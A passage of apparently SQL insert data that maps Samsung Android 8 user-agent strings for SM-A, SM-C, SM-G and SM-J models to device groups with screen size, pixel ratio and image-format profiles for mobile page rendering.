Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A720F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A730F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A750F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A750FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A750G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A750GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A810F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A910F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A920F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-C5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-C7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-C7010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-C710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-C9000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-C900F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G390F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G570F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G570M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G570Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G6100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G610F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G610M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G611F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G611MT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G615F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G891A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G892A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G930A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G930F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G930K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G930P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G930R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G930R6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G930S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G930T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G930T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G930U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G930VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G930W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G9350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G935A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G935F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G935P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G935R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G935T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G935U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G935V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G935W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G950F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G950U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G950U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G950W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G9550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G955F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G955U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G955U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G960F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G960U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G960U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G960W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G9650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G965F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G965U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-G965U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J260MU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J260T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J327A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J327R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J327U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J327W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J330F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J330FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J330G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J337A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J337P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J337R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J337T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J337U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 